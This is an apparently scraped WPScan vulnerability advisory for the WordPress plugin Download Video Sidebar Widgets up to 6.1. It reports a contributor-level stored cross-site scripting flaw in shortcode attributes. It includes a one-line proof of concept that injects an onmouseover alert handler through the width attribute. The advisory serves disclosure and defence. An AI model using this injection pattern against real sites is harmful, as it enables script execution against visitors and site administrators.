Lucene search

K
wpvulndbLana CodesWPVDB-ID:61873267-9F4F-4BE5-BAD6-95229AD54B99
HistoryJan 26, 2023 - 12:00 a.m.

Download Video Sidebar Widgets <= 6.1 - Contributor+ Stored XSS via Shortcode

2023-01-2600:00:00
Lana Codes
wpscan.com
9
plugin validation issue
stored xss
contributor role

0.001 Low

EPSS

Percentile

23.3%

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

PoC

[vsw source=“youtube” id=“3PdILZ_1P74” autoplay=“yes” width=“100%’ onmouseover=‘alert(/XSS/)’” height=“400px”]

CPENameOperatorVersion
video-sidebar-widgetseq*

0.001 Low

EPSS

Percentile

23.3%

Related for WPVDB-ID:61873267-9F4F-4BE5-BAD6-95229AD54B99